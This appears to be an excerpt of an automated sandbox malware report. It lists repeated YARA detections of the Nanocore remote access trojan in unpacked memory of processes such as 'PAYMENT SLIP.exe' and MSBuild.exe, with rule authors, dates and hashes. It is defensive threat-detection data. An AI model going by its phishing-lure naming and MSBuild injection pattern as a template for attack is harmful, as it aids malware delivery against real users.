        Source: 12.2.MSBuild.exe.48e703e.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 10.2.PAYMENT SLIP.exe.24e0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 10.2.PAYMENT SLIP.exe.24e0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 10.2.PAYMENT SLIP.exe.24e0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.1420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.17f0000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17f0000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 13.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.1830000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1830000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.1420000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1420000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1840000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1840000.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.MSBuild.exe.40feae4.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.MSBuild.exe.40feae4.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.MSBuild.exe.3f5eae4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.MSBuild.exe.3f5eae4.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 6.2.PAYMENT SLIP.exe.3160000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.PAYMENT SLIP.exe.3160000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 6.2.PAYMENT SLIP.exe.3160000.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 20.2.PAYMENT SLIP.exe.3050000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.2.PAYMENT SLIP.exe.3050000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 20.2.PAYMENT SLIP.exe.3050000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.48e703e.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.48e703e.26.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1830000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1830000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 8.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 8.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.48632ce.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.48632ce.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 8.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 8.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.MSBuild.exe.40feae4.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.MSBuild.exe.40feae4.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.17a0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17a0000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.17e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.4507ac8.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.4507ac8.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.3530f30.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.3530f30.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.61a0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.61a0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.MSBuild.exe.3f59cae.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.MSBuild.exe.3f59cae.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.MSBuild.exe.3f59cae.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.46574b4.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.46574b4.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1810000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1810000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.MSBuild.exe.40f9cae.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.MSBuild.exe.40f9cae.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.MSBuild.exe.40f9cae.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.2.MSBuild.exe.3530f30.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.3530f30.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.2.MSBuild.exe.3f6310d.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.MSBuild.exe.3f6310d.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.1870000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.1870000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 22.2.MSBuild.exe.3f5eae4.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.2.MSBuild.exe.3f5eae4.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.MSBuild.exe.17c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.MSBuild.exe.17c0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
